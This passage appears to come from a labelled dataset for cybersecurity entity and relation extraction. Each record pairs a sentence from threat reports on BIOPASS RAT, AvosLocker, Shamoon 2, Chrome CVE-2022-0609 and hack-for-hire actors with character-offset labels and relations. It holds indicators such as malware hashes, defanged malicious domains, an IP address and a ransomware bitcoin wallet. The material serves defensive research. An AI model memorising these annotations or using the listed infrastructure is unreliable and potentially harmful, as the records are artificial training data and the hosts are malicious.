"label": "FILEPATH",
"start_offset": 85
},
{
"end_offset": 179,
"id": 46947,
"label": "tools",
"start_offset": 171
},
{
"end_offset": 49,
"id": 46939,
"label": "tools",
"start_offset": 42
},
{
"end_offset": 122,
"id": 46943,
"label": "vulnerability",
"start_offset": 113
},
{
"end_offset": 288,
"id": 46950,
"label": "FILEPATH",
"start_offset": 276
},
{
"end_offset": 201,
"id": 46948,
"label": "attack-pattern",
"start_offset": 185
},
{
"end_offset": 253,
"id": 46949,
"label": "attack-pattern",
"start_offset": 218
},
{
"end_offset": 212,
"id": 46953,
"label": "tools",
"start_offset": 202
},
{
"end_offset": 284,
"id": 46956,
"label": "tools",
"start_offset": 276
},
{
"end_offset": 108,
"id": 46955,
"label": "attack-pattern",
"start_offset": 104
}
] | [
{
"from_id": 46938,
"id": 272,
"to_id": 46947,
"type": "downloads"
},
{
"from_id": 46938,
"id": 267,
"to_id": 46939,
"type": "downloads"
},
{
"from_id": 46938,
"id": 268,
"to_id": 46940,
"type": "downloads"
},
{
"from_id": 46940,
"id": 269,
"to_id": 46942,
"type": "uses"
},
{
"from_id": 46938,
"id": 271,
"to_id": 46944,
"type": "downloads"
},
{
"from_id": 46938,
"id": 273,
"to_id": 46953,
"type": "downloads"
},
{
"from_id": 46938,
"id": 276,
"to_id": 46956,
"type": "downloads"
}
] |
13,541 | Victims are now mainly located only in Japan. | [
{
"end_offset": 44,
"id": 51611,
"label": "location",
"start_offset": 39
},
{
"end_offset": 7,
"id": 51612,
"label": "identity",
"start_offset": 0
}
] | [
{
"from_id": 51612,
"id": 1111,
"to_id": 51611,
"type": "located-at"
}
] |
4,845 | We have also observed Indian hack-for-hire firms work with freelance actors not directly employed by the firms themselves. | [
{
"end_offset": 28,
"id": 50804,
"label": "location",
"start_offset": 22
},
{
"end_offset": 48,
"id": 50805,
"label": "identity",
"start_offset": 29
}
] | [
{
"from_id": 50805,
"id": 1019,
"to_id": 50804,
"type": "located-at"
}
] |
2,058 | From the GitHub page, we also observed a URL to a site – xn--90a5ai[.]com(фсб[.]com) – resolving to the previously mentioned IP 164[.]68[.]114[.]29, which at this point in time only shows an animation of interconnecting points. | [
{
"end_offset": 83,
"id": 45239,
"label": "url",
"start_offset": 74
},
{
"end_offset": 147,
"id": 45240,
"label": "IPV4",
"start_offset": 128
},
{
"end_offset": 15,
"id": 45237,
"label": "SOFTWARE",
"start_offset": 9
},
{
"end_offset": 73,
"id": 45238,
"label": "url",
"start_offset": 57
}
] | [
{
"from_id": 45238,
"id": 306,
"to_id": 45240,
"type": "related-to"
},
{
"from_id": 45239,
"id": 307,
"to_id": 45240,
"type": "related-to"
}
] |
3,365 | .Python.BIOPASS.A f21decb19da8d8c07066a78839ffd8af6721b1f4323f10a1df030325a1a5e159 cdaemon.txt BIOPASS RAT Python Script (Cdaemon module) | [
{
"end_offset": 109,
"id": 10182,
"label": "malware",
"start_offset": 98
},
{
"end_offset": 83,
"id": 10181,
"label": "hash",
"start_offset": 19
},
{
"end_offset": 96,
"id": 48983,
"label": "FILEPATH",
"start_offset": 85
},
{
"end_offset": 17,
"id": 48984,
"label": "malware",
"start_offset": 1
}
] | [
{
"from_id": 10181,
"id": 542,
"to_id": 10182,
"type": "indicates"
},
{
"from_id": 48983,
"id": 543,
"to_id": 10182,
"type": "indicates"
},
{
"from_id": 48983,
"id": 544,
"to_id": 10181,
"type": "duplicate-of"
},
{
"from_id": 48984,
"id": 545,
"to_id": 10182,
"type": "duplicate-of"
}
] |
5,070 | On February 10, Threat Analysis Group discovered two distinct North Korean government-backed attacker groups exploiting a remote code execution vulnerability in Chrome, CVE-2022-0609. | [
{
"end_offset": 14,
"id": 51176,
"label": "TIME",
"start_offset": 3
},
{
"end_offset": 37,
"id": 51177,
"label": "identity",
"start_offset": 16
},
{
"end_offset": 108,
"id": 51178,
"label": "threat-actor",
"start_offset": 62
},
{
"end_offset": 157,
"id": 51179,
"label": "vulnerability",
"start_offset": 122
},
{
"end_offset": 182,
"id": 51180,
"label": "vulnerability",
"start_offset": 169
},
{
"end_offset": 167,
"id": 51181,
"label": "SOFTWARE",
"start_offset": 161
}
] | [
{
"from_id": 51179,
"id": 1068,
"to_id": 51180,
"type": "duplicate-of"
},
{
"from_id": 51181,
"id": 1069,
"to_id": 51180,
"type": "has"
},
{
"from_id": 51178,
"id": 1070,
"to_id": 51180,
"type": "exploits"
}
] |
3,409 | BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 9eed9a2e0edf38f6354f4e57b3a6b9bed5b19263f54bcee19e66fc8af0c29e4e test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 9f34d28562e7e1e3721bbf679c58aa8f5898995ed999a641f26de120f3a42cf4 Silverlight1.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 9ff906ffcde32e4c6fb3ea4652e6d6326713a7fde8bb783b52f12a1f382f8798 test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A a7c4dac7176e291bd2aba860e1aa301fb5f7d880794f493f2dea0982e2b7eb31 test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A b48e01ff816f12125f9f4cfc9180d534c7c57ef4ee50c0ebbe445e88d4ade939 test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A b82bde3fe5ee900a76ac27b4869ed9aa0802c63bbd72b3bfb0f1abce6340cc6c Silverlight_ins.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A b9d0838be8952ebd4218c8f548ce94901f789ec1e32f5eaf46733f0c94c77999 Silverlight_ins.exe | [
{
"end_offset": 11,
"id": 10275,
"label": "malware",
"start_offset": 0
},
{
"end_offset": 110,
"id": 10276,
"label": "hash",
"start_offset": 46
},
{
"end_offset": 133,
"id": 10277,
"label": "malware",
"start_offset": 122
},
{
"end_offset": 263,
"id": 10279,
"label": "malware",
"start_offset": 252
},
{
"end_offset": 385,
"id": 10281,
"label": "malware",
"start_offset": 374
},
{
"end_offset": 484,
"id": 10282,
"label": "hash",
"start_offset": 420
},
{
"end_offset": 507,
"id": 10283,
"label": "malware",
"start_offset": 496
},
{
"end_offset": 606,
"id": 10284,
"label": "hash",
"start_offset": 542
},
{
"end_offset": 629,
"id": 10285,
"label": "malware",
"start_offset": 618
},
{
"end_offset": 728,
"id": 10286,
"label": "hash",
"start_offset": 664
},
{
"end_offset": 762,
"id": 10287,
"label": "malware",
"start_offset": 751
},
{
"end_offset": 861,
"id": 10288,
"label": "hash",
"start_offset": 797
},
{
"end_offset": 232,
"id": 10278,
"label": "hash",
"start_offset": 168
},
{
"end_offset": 362,
"id": 10280,
"label": "hash",
"start_offset": 298
},
{
"end_offset": 44,
"id": 49076,
"label": "malware",
"start_offset": 20
},
{
"end_offset": 250,
"id": 49078,
"label": "FILEPATH",
"start_offset": 234
},
{
"end_offset": 296,
"id": 49079,
"label": "malware",
"start_offset": 272
},
{
"end_offset": 418,
"id": 49081,
"label": "malware",
"start_offset": 394
},
{
"end_offset": 540,
"id": 49083,
"label": "malware",
"start_offset": 516
},
{
"end_offset": 795,
"id": 49087,
"label": "malware",
"start_offset": 771
},
{
"end_offset": 166,
"id": 49077,
"label": "malware",
"start_offset": 142
},
{
"end_offset": 372,
"id": 49080,
"label": "FILEPATH",
"start_offset": 364
},
{
"end_offset": 616,
"id": 49084,
"label": "FILEPATH",
"start_offset": 608
},
{
"end_offset": 749,
"id": 49086,
"label": "FILEPATH",
"start_offset": 730
},
{
"end_offset": 882,
"id": 49088,
"label": "FILEPATH",
"start_offset": 863
},
{
"end_offset": 120,
"id": 49089,
"label": "FILEPATH",
"start_offset": 112
},
{
"end_offset": 494,
"id": 49082,
"label": "FILEPATH",
"start_offset": 486
},
{
"end_offset": 662,
"id": 49085,
"label": "malware",
"start_offset": 638
}
] | [
{
"from_id": 10275,
"id": 654,
"to_id": 49076,
"type": "duplicate-of"
},
{
"from_id": 10277,
"id": 655,
"to_id": 49077,
"type": "duplicate-of"
},
{
"from_id": 10279,
"id": 656,
"to_id": 49079,
"type": "duplicate-of"
},
{
"from_id": 10281,
"id": 657,
"to_id": 49081,
"type": "duplicate-of"
},
{
"from_id": 10283,
"id": 658,
"to_id": 49083,
"type": "duplicate-of"
},
{
"from_id": 10285,
"id": 659,
"to_id": 49085,
"type": "duplicate-of"
},
{
"from_id": 10287,
"id": 660,
"to_id": 49087,
"type": "duplicate-of"
},
{
"from_id": 49088,
"id": 661,
"to_id": 10288,
"type": "duplicate-of"
},
{
"from_id": 49086,
"id": 662,
"to_id": 10286,
"type": "duplicate-of"
},
{
"from_id": 49084,
"id": 663,
"to_id": 10284,
"type": "duplicate-of"
},
{
"from_id": 49082,
"id": 664,
"to_id": 10282,
"type": "duplicate-of"
},
{
"from_id": 49080,
"id": 665,
"to_id": 10280,
"type": "duplicate-of"
},
{
"from_id": 49078,
"id": 666,
"to_id": 10278,
"type": "duplicate-of"
},
{
"from_id": 49089,
"id": 667,
"to_id": 10276,
"type": "duplicate-of"
},
{
"from_id": 10276,
"id": 668,
"to_id": 49076,
"type": "indicates"
},
{
"from_id": 49089,
"id": 669,
"to_id": 49076,
"type": "indicates"
},
{
"from_id": 49078,
"id": 670,
"to_id": 49077,
"type": "indicates"
},
{
"from_id": 10278,
"id": 671,
"to_id": 49077,
"type": "indicates"
},
{
"from_id": 49080,
"id": 672,
"to_id": 49079,
"type": "indicates"
},
{
"from_id": 10280,
"id": 673,
"to_id": 49079,
"type": "indicates"
},
{
"from_id": 49082,
"id": 674,
"to_id": 49081,
"type": "indicates"
},
{
"from_id": 10282,
"id": 675,
"to_id": 49081,
"type": "indicates"
},
{
"from_id": 49084,
"id": 676,
"to_id": 49083,
"type": "indicates"
},
{
"from_id": 10284,
"id": 677,
"to_id": 49083,
"type": "indicates"
},
{
"from_id": 49086,
"id": 678,
"to_id": 49085,
"type": "indicates"
},
{
"from_id": 10286,
"id": 679,
"to_id": 49085,
"type": "indicates"
},
{
"from_id": 49088,
"id": 680,
"to_id": 10287,
"type": "indicates"
}
] |
3,393 | BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 3e8f8b8a5f70c195a2e4d4fc7f80523809f6dbf9ead061ce8ef04fb489a577cf test-flash.exe BIOPASS RAT Loader Backdoor.Win32.BIOPASS.A 5d7aa3474e734913ecb4b820c0c546c92f7684081c519eecd3990e11a19bf2ba flash_installer.exe | [
{
"end_offset": 11,
"id": 10244,
"label": "malware",
"start_offset": 0
},
{
"end_offset": 139,
"id": 10246,
"label": "malware",
"start_offset": 128
},
{
"end_offset": 110,
"id": 10245,
"label": "hash",
"start_offset": 46
},
{
"end_offset": 238,
"id": 10247,
"label": "hash",
"start_offset": 174
},
{
"end_offset": 44,
"id": 49048,
"label": "malware",
"start_offset": 20
},
{
"end_offset": 172,
"id": 49047,
"label": "malware",
"start_offset": 148
},
{
"end_offset": 259,
"id": 49050,
"label": "FILEPATH",
"start_offset": 240
},
{
"end_offset": 126,
"id": 49049,
"label": "FILEPATH",
"start_offset": 112
}
] | [
{
"from_id": 10244,
"id": 600,
"to_id": 49048,
"type": "duplicate-of"
},
{
"from_id": 10246,
"id": 601,
"to_id": 49047,
"type": "duplicate-of"
},
{
"from_id": 49049,
"id": 602,
"to_id": 10245,
"type": "duplicate-of"
},
{
"from_id": 49050,
"id": 603,
"to_id": 10247,
"type": "duplicate-of"
},
{
"from_id": 10247,
"id": 604,
"to_id": 49047,
"type": "indicates"
},
{
"from_id": 49050,
"id": 605,
"to_id": 49047,
"type": "indicates"
},
{
"from_id": 49049,
"id": 606,
"to_id": 49048,
"type": "indicates"
},
{
"from_id": 10245,
"id": 607,
"to_id": 49048,
"type": "indicates"
}
] |
1,882 | AvosLocker executable 05ba2df0033e3cd5b987d66b6de545df439d338a20165c0ba96cde8a74e463e5 Ransom.Win32.AVOSLOCKER.SMYXBLNT Mimikatz executable (x32 and x64) 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 HackTool.Win64.MIMIKATZ.ZTJA e81a8f8ad804c4d83869d7806a303ff04f31cce376c5df8aada2e9db2c1eeb98 HackTool.Win32.Mimikatz.CNFW Log4shell Nmap NSE script ddcb0e99f27e79d3536a15e0d51f7f33c38b2ae48677570f36f5e92863db5a96 Backdoor.Win32.CVE202144228.YACAH Impacket tool 14f0c4ce32821a7d25ea5e016ea26067d6615e3336c3baa854ea37a290a462a8 HackTool.Win32.Impacket.AA | [
{
"end_offset": 128,
"id": 5525,
"label": "tools",
"start_offset": 120
},
{
"end_offset": 356,
"id": 5529,
"label": "tools",
"start_offset": 352
},
{
"end_offset": 86,
"id": 5523,
"label": "hash",
"start_offset": 22
},
{
"end_offset": 432,
"id": 5530,
"label": "hash",
"start_offset": 368
},
{
"end_offset": 10,
"id": 5522,
"label": "malware",
"start_offset": 0
},
{
"end_offset": 218,
"id": 5527,
"label": "hash",
"start_offset": 154
},
{
"end_offset": 312,
"id": 5528,
"label": "hash",
"start_offset": 248
},
{
"end_offset": 545,
"id": 5533,
"label": "hash",
"start_offset": 481
},
{
"end_offset": 475,
"id": 5531,
"label": "tools",
"start_offset": 467
},
{
"end_offset": 572,
"id": 47007,
"label": "tools",
"start_offset": 546
},
{
"end_offset": 247,
"id": 47009,
"label": "tools",
"start_offset": 219
},
{
"end_offset": 351,
"id": 47011,
"label": "vulnerability",
"start_offset": 342
},
{
"end_offset": 119,
"id": 47012,
"label": "malware",
"start_offset": 87
},
{
"end_offset": 341,
"id": 47008,
"label": "tools",
"start_offset": 313
},
{
"end_offset": 466,
"id": 47010,
"label": "tools",
"start_offset": 433
}
] | [
{
"from_id": 47012,
"id": 288,
"to_id": 5522,
"type": "duplicate-of"
},
{
"from_id": 5522,
"id": 287,
"to_id": 5523,
"type": "consists-of"
}
] |
1,262 | All five phishing campaigns targeted a Japanese manufacturing firm over the course of two months, but the final campaign also targeted a separate Japanese high-tech organization. | [
{
"end_offset": 27,
"id": 46637,
"label": "attack-pattern",
"start_offset": 9
},
{
"end_offset": 177,
"id": 46639,
"label": "identity",
"start_offset": 146
},
{
"end_offset": 61,
"id": 46638,
"label": "identity",
"start_offset": 39
}
] | [
{
"from_id": 46637,
"id": 203,
"to_id": 46639,
"type": "targets"
},
{
"from_id": 46637,
"id": 202,
"to_id": 46638,
"type": "targets"
}
] |
2,558 | In our research, we’re able to outline that Shamoon 2 enters and spreads through an organization in three stages: These stages are outlined in the image below. And that credential theft is a key element in each stage: It’s also worth noting that credentials are a keystone issue in Shamoon 2 wave 2 too: we saw evidence of targeting an organization’s virtual desktop infrastructure (VDI) solutions with default credentials. | [
{
"end_offset": 54,
"id": 47755,
"label": "threat-actor",
"start_offset": 45
},
{
"end_offset": 302,
"id": 47758,
"label": "campaign",
"start_offset": 286
},
{
"end_offset": 188,
"id": 47756,
"label": "attack-pattern",
"start_offset": 172
}
] | [
{
"from_id": 47758,
"id": 349,
"to_id": 47756,
"type": "uses"
}
] |
2,391 | But because Earth Baku has updated its toolset with StealthVector, StealthMutant, and ScrambleCross for this new campaign, we have identified it as its own separate operation. | [
{
"end_offset": 22,
"id": 45488,
"label": "threat-actor",
"start_offset": 12
},
{
"end_offset": 65,
"id": 45490,
"label": "malware",
"start_offset": 52
},
{
"end_offset": 80,
"id": 45491,
"label": "malware",
"start_offset": 67
},
{
"end_offset": 99,
"id": 45492,
"label": "malware",
"start_offset": 86
}
] | [
{
"from_id": 45488,
"id": 102,
"to_id": 45491,
"type": "uses"
},
{
"from_id": 45488,
"id": 103,
"to_id": 45492,
"type": "uses"
},
{
"from_id": 45488,
"id": 101,
"to_id": 45490,
"type": "uses"
}
] |
3,912 | One notable vulnerability in the Microsoft Exchange Server is CVE-2020-0688, a remote code execution bug. | [
{
"end_offset": 58,
"id": 49764,
"label": "SOFTWARE",
"start_offset": 33
},
{
"end_offset": 75,
"id": 49765,
"label": "vulnerability",
"start_offset": 62
},
{
"end_offset": 100,
"id": 49766,
"label": "attack-pattern",
"start_offset": 79
}
] | [
{
"from_id": 49764,
"id": 866,
"to_id": 49765,
"type": "has"
},
{
"from_id": 49765,
"id": 867,
"to_id": 49766,
"type": "uses"
}
] |
1,320 | FormerFirstRAT communicates using unencrypted HTTP over port 443; the use of mismatching ports and communication protocols is not uncommon in targeted attack campaigns. | [
{
"end_offset": 14,
"id": 3993,
"label": "malware",
"start_offset": 0
},
{
"end_offset": 167,
"id": 46669,
"label": "campaign",
"start_offset": 142
}
] | [
{
"from_id": 46669,
"id": 210,
"to_id": 3993,
"type": "uses"
}
] |
4,244 | We found more code shared among the two threat actor’s malware, as Patchwork recently used multiple Delphi malware similar to some of the Delphi malware we described before. | [
{
"end_offset": 152,
"id": 50049,
"label": "malware",
"start_offset": 138
},
{
"end_offset": 114,
"id": 50050,
"label": "malware",
"start_offset": 100
},
{
"end_offset": 76,
"id": 50048,
"label": "threat-actor",
"start_offset": 67
}
] | [
{
"from_id": 50048,
"id": 904,
"to_id": 50050,
"type": "uses"
},
{
"from_id": 50049,
"id": 905,
"to_id": 50050,
"type": "duplicate-of"
}
] |
3,337 | We have found several connections between BIOPASS RAT and the Winnti Group: | [
{
"end_offset": 53,
"id": 10096,
"label": "malware",
"start_offset": 42
},
{
"end_offset": 74,
"id": 48945,
"label": "threat-actor",
"start_offset": 62
}
] | [
{
"from_id": 48945,
"id": 506,
"to_id": 10096,
"type": "uses"
}
] |
14,263 | Our analysis of the latest Maikspy variants revealed that users contracted the spyware from hxxp://miakhalifagame[.]com/, a website that distributes malicious apps (including the 2016 adult game) and connects to its C&C server to upload data from infected devices and machines. | [
{
"end_offset": 35,
"id": 48474,
"label": "malware",
"start_offset": 27
},
{
"end_offset": 120,
"id": 48475,
"label": "URL",
"start_offset": 92
},
{
"end_offset": 226,
"id": 48477,
"label": "Infrastucture",
"start_offset": 216
},
{
"end_offset": 183,
"id": 48476,
"label": "TIME",
"start_offset": 179
}
] | [
{
"from_id": 48474,
"id": 424,
"to_id": 48475,
"type": "related-to"
},
{
"from_id": 48475,
"id": 425,
"to_id": 48477,
"type": "related-to"
},
{
"from_id": 48477,
"id": 426,
"to_id": 48474,
"type": "related-to"
}
] |
4,847 | A recent campaign from an Indian hack-for-hire operator was observed targeting an IT company in Cyprus, an education institution in Nigeria, a fintech company in the Balkans and a shopping company in Israel. | [
{
"end_offset": 206,
"id": 50812,
"label": "location",
"start_offset": 200
},
{
"end_offset": 102,
"id": 50809,
"label": "location",
"start_offset": 96
},
{
"end_offset": 32,
"id": 50807,
"label": "location",
"start_offset": 26
},
{
"end_offset": 55,
"id": 50808,
"label": "identity",
"start_offset": 33
},
{
"end_offset": 139,
"id": 50810,
"label": "location",
"start_offset": 132
},
{
"end_offset": 173,
"id": 50811,
"label": "location",
"start_offset": 166
}
] | [
{
"from_id": 50808,
"id": 1020,
"to_id": 50807,
"type": "located-at"
},
{
"from_id": 50808,
"id": 1021,
"to_id": 50809,
"type": "targets"
},
{
"from_id": 50808,
"id": 1023,
"to_id": 50811,
"type": "targets"
},
{
"from_id": 50808,
"id": 1024,
"to_id": 50812,
"type": "targets"
},
{
"from_id": 50808,
"id": 1022,
"to_id": 50810,
"type": "targets"
}
] |
4,826 | COLDRIVER, a Russian-based threat actor sometimes referred to as Callisto, continues to send credential phishing emails to targets including government and defense officials, politicians, NGOs and think tanks, and journalists. | [
{
"end_offset": 20,
"id": 50774,
"label": "location",
"start_offset": 13
},
{
"end_offset": 73,
"id": 50775,
"label": "threat-actor",
"start_offset": 65
},
{
"end_offset": 9,
"id": 50773,
"label": "threat-actor",
"start_offset": 0
},
{
"end_offset": 119,
"id": 50776,
"label": "attack-pattern",
"start_offset": 93
}
] | [
{
"from_id": 50773,
"id": 1013,
"to_id": 50774,
"type": "located-at"
},
{
"from_id": 50775,
"id": 1014,
"to_id": 50773,
"type": "duplicate-of"
}
] |
947 | Taomike is a Chinese company that aims to become the biggest mobile advertisement solution platform in China. | [
{
"end_offset": 8,
"id": 46455,
"label": "identity",
"start_offset": 1
},
{
"end_offset": 21,
"id": 46456,
"label": "location",
"start_offset": 14
},
{
"end_offset": 109,
"id": 46457,
"label": "location",
"start_offset": 104
}
] | [
{
"from_id": 46455,
"id": 192,
"to_id": 46456,
"type": "located-at"
}
] |
13,922 | As previously mentioned, DarkSide avoids victimizing companies in CIS countries. | [
{
"end_offset": 34,
"id": 48750,
"label": "malware",
"start_offset": 25
},
{
"end_offset": 79,
"id": 48751,
"label": "location",
"start_offset": 66
}
] | [
{
"from_id": 48750,
"id": 456,
"to_id": 48751,
"type": "related-to"
}
] |
2,496 | Palo Alto Networks Cortex XDR Prevent and Pro customers running agent version 7.4 and above with content version 450-87751 on Linux devices are protected from CVE-2022-22963 using the Java Deserialization module; customers running agent version 7.7 and content 480 and above are protected from CVE-2022-22963 and CVE-2022-22965 for both Windows and Linux using the Java Deserialization module; other OSes and exploits receive protections from post-exploitation activities using Behavioral Threat Protection, Password Theft Prevention, Anti Ransomware and other Anti Exploitation modules. | [
{
"end_offset": 173,
"id": 47587,
"label": "vulnerability",
"start_offset": 159
},
{
"end_offset": 45,
"id": 47585,
"label": "SOFTWARE",
"start_offset": 0
},
{
"end_offset": 211,
"id": 47588,
"label": "SOFTWARE",
"start_offset": 184
},
{
"end_offset": 327,
"id": 47590,
"label": "vulnerability",
"start_offset": 313
},
{
"end_offset": 344,
"id": 47591,
"label": "SOFTWARE",
"start_offset": 337
},
{
"end_offset": 392,
"id": 47593,
"label": "SOFTWARE",
"start_offset": 365
},
{
"end_offset": 131,
"id": 47586,
"label": "SOFTWARE",
"start_offset": 126
},
{
"end_offset": 308,
"id": 47589,
"label": "vulnerability",
"start_offset": 294
},
{
"end_offset": 354,
"id": 47592,
"label": "SOFTWARE",
"start_offset": 349
}
] | [
{
"from_id": 47587,
"id": 342,
"to_id": 47588,
"type": "related-to"
}
] |
4,817 | Follina is a remote code execution (RCE) vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT). | [
{
"end_offset": 110,
"id": 50748,
"label": "SOFTWARE",
"start_offset": 62
},
{
"end_offset": 54,
"id": 50746,
"label": "vulnerability",
"start_offset": 13
},
{
"end_offset": 7,
"id": 50747,
"label": "vulnerability",
"start_offset": 0
}
] | [
{
"from_id": 50746,
"id": 1004,
"to_id": 50747,
"type": "duplicate-of"
},
{
"from_id": 50748,
"id": 1005,
"to_id": 50747,
"type": "has"
}
] |
3,766 | Attackers can, therefore, leverage CVE-2022-22954 to remotely execute commands to overwrite specific paths. | [
{
"end_offset": 107,
"id": 49598,
"label": "attack-pattern",
"start_offset": 83
},
{
"end_offset": 50,
"id": 49596,
"label": "vulnerability",
"start_offset": 36
},
{
"end_offset": 79,
"id": 49597,
"label": "attack-pattern",
"start_offset": 54
}
] | [
{
"from_id": 49596,
"id": 842,
"to_id": 49597,
"type": "uses"
},
{
"from_id": 49596,
"id": 843,
"to_id": 49598,
"type": "uses"
}
] |
4,850 | One cluster of this activity frequently targets government, healthcare, and telecom sectors in Saudi Arabia, the United Arab Emirates, and Bahrain with credential phishing campaigns. | [
{
"end_offset": 107,
"id": 50820,
"label": "location",
"start_offset": 95
},
{
"end_offset": 133,
"id": 50821,
"label": "location",
"start_offset": 113
},
{
"end_offset": 146,
"id": 50822,
"label": "location",
"start_offset": 139
},
{
"end_offset": 181,
"id": 50823,
"label": "campaign",
"start_offset": 152
}
] | [
{
"from_id": 50823,
"id": 1025,
"to_id": 50822,
"type": "targets"
},
{
"from_id": 50823,
"id": 1026,
"to_id": 50820,
"type": "targets"
},
{
"from_id": 50823,
"id": 1027,
"to_id": 50821,
"type": "targets"
}
] |
2,298 | In late August 2021, TAG discovered watering hole attacks targeting visitors to Hong Kong websites for a media outlet and a prominent pro-democracy labor and political group. | [
{
"end_offset": 19,
"id": 45449,
"label": "TIME",
"start_offset": 8
},
{
"end_offset": 49,
"id": 45451,
"label": "attack-pattern",
"start_offset": 36
},
{
"end_offset": 173,
"id": 45453,
"label": "identity",
"start_offset": 134
},
{
"end_offset": 90,
"id": 45452,
"label": "location",
"start_offset": 80
},
{
"end_offset": 24,
"id": 45450,
"label": "identity",
"start_offset": 21
}
] | [
{
"from_id": 45453,
"id": 97,
"to_id": 45451,
"type": "targets"
},
{
"from_id": 45451,
"id": 96,
"to_id": 45452,
"type": "targets"
}
] |
13,551 | The script connects to the Water Pamola’s server and downloads additional payloads. | [
{
"end_offset": 10,
"id": 51627,
"label": "malware",
"start_offset": 4
},
{
"end_offset": 48,
"id": 51626,
"label": "Infrastucture",
"start_offset": 27
}
] | [
{
"from_id": 51627,
"id": 1117,
"to_id": 51626,
"type": "beacons-to"
}
] |
2,354 | Beer was able to quickly recognize this exploit as a variant of an earlier port type confusion vulnerability he analyzed in the XNU kernel (CVE-2020-27932). | [
{
"end_offset": 138,
"id": 47411,
"label": "SOFTWARE",
"start_offset": 128
},
{
"end_offset": 154,
"id": 47412,
"label": "vulnerability",
"start_offset": 140
}
] | [
{
"from_id": 47412,
"id": 318,
"to_id": 47411,
"type": "has"
}
] |
2,061 | , we were able to observe another GitHub account with the name l4ckyguy, sharing the profile picture, location and URL in the description, with a link to the previously observed account (x4kme), and a name, Ivan Topor, which we believe may be another alias for this threat actor. | [
{
"end_offset": 40,
"id": 45241,
"label": "SOFTWARE",
"start_offset": 34
},
{
"end_offset": 71,
"id": 45242,
"label": "identity",
"start_offset": 63
},
{
"end_offset": 192,
"id": 45243,
"label": "threat-actor",
"start_offset": 187
},
{
"end_offset": 218,
"id": 45244,
"label": "identity",
"start_offset": 207
},
{
"end_offset": 114,
"id": 6137,
"label": "location",
"start_offset": 111
},
{
"end_offset": 198,
"id": 6138,
"label": "location",
"start_offset": 195
},
{
"end_offset": 239,
"id": 6140,
"label": "location",
"start_offset": 236
}
] | [
{
"from_id": 45243,
"id": 93,
"to_id": 45244,
"type": "related-to"
},
{
"from_id": 45243,
"id": 92,
"to_id": 45242,
"type": "related-to"
}
] |
4,383 | Like much of their tooling, HYPERSCRAPE is not notable for its technical sophistication, but rather its effectiveness in accomplishing Charming Kitten’s objectives. | [
{
"end_offset": 39,
"id": 50196,
"label": "malware",
"start_offset": 28
},
{
"end_offset": 150,
"id": 50197,
"label": "threat-actor",
"start_offset": 135
}
] | [
{
"from_id": 50197,
"id": 931,
"to_id": 50196,
"type": "uses"
}
] |
1,716 | I2P users can access specific I2P services that are only accessible on I2P, or access Internet resources without exposing their IP address. In the case of CryptoWall 3.0, the malware is attempting to access multiple .i2p resources only accessible through I2P, also known as “eepSites.” The CryptoWall 3.0 uses I2P in the same way CryptoWall 2.0 used Tor, to give victims access to a decrypting service to get their files back. | [
{
"end_offset": 74,
"id": 45105,
"label": "SOFTWARE",
"start_offset": 71
},
{
"end_offset": 33,
"id": 45104,
"label": "SOFTWARE",
"start_offset": 30
},
{
"end_offset": 170,
"id": 45106,
"label": "malware",
"start_offset": 156
},
{
"end_offset": 260,
"id": 45107,
"label": "SOFTWARE",
"start_offset": 256
},
{
"end_offset": 306,
"id": 45108,
"label": "malware",
"start_offset": 292
},
{
"end_offset": 315,
"id": 45110,
"label": "SOFTWARE",
"start_offset": 312
},
{
"end_offset": 346,
"id": 45111,
"label": "malware",
"start_offset": 332
},
{
"end_offset": 3,
"id": 45103,
"label": "SOFTWARE",
"start_offset": 0
},
{
"end_offset": 355,
"id": 5104,
"label": "tools",
"start_offset": 352
}
] | [
{
"from_id": 45111,
"id": 250,
"to_id": 5104,
"type": "uses"
},
{
"from_id": 45108,
"id": 252,
"to_id": 45111,
"type": "related-to"
},
{
"from_id": 45106,
"id": 253,
"to_id": 45107,
"type": "uses"
},
{
"from_id": 45108,
"id": 251,
"to_id": 45110,
"type": "uses"
}
] |
3,362 | c1222.txt BIOPASS RAT Python Script (C1222 module) Trojan | [
{
"end_offset": 22,
"id": 10176,
"label": "malware",
"start_offset": 11
},
{
"end_offset": 9,
"id": 48978,
"label": "FILEPATH",
"start_offset": 0
}
] | [
{
"from_id": 48978,
"id": 533,
"to_id": 10176,
"type": "indicates"
}
] |
2,594 | In December 2021, the Ministry of Health of Brazil fell victim to an attack claimed by Lapsus$ (Figure 2). | [
{
"end_offset": 16,
"id": 47778,
"label": "TIME",
"start_offset": 3
},
{
"end_offset": 94,
"id": 47780,
"label": "threat-actor",
"start_offset": 87
},
{
"end_offset": 50,
"id": 47779,
"label": "identity",
"start_offset": 22
}
] | [
{
"from_id": 47780,
"id": 351,
"to_id": 47779,
"type": "targets"
}
] |
3,911 | Based on our investigation, the Chopper web shell is dropped via a system token, potentially via a Microsoft Exchange Server vulnerability. | [
{
"end_offset": 138,
"id": 49762,
"label": "vulnerability",
"start_offset": 99
},
{
"end_offset": 49,
"id": 49763,
"label": "malware",
"start_offset": 32
}
] | [
{
"from_id": 49763,
"id": 865,
"to_id": 49762,
"type": "exploits"
}
] |
4,460 | At the time, our Android team released research about a newly discovered family of spyware related to Pegasus that was used in a targeted attack on a small number of Android devices. | [
{
"end_offset": 109,
"id": 50243,
"label": "malware",
"start_offset": 102
},
{
"end_offset": 173,
"id": 50244,
"label": "SOFTWARE",
"start_offset": 166
},
{
"end_offset": 29,
"id": 50245,
"label": "identity",
"start_offset": 17
}
] | [
{
"from_id": 50243,
"id": 934,
"to_id": 50244,
"type": "targets"
}
] |
554 | For example, the Xorist ransomware (SHA256: 4979A10B81C41ECC0FC3A0F376ADE766CE616D2301639F74E0277047CC40E3D6) demanded £1,000 for a ransom; the bitcoin wallet address was 1BFqrLCDwwrxueY7FFDn8DqeoasPJignxt. | [
{
"end_offset": 108,
"id": 1837,
"label": "hash",
"start_offset": 44
},
{
"end_offset": 34,
"id": 46168,
"label": "malware",
"start_offset": 17
},
{
"end_offset": 151,
"id": 46169,
"label": "SOFTWARE",
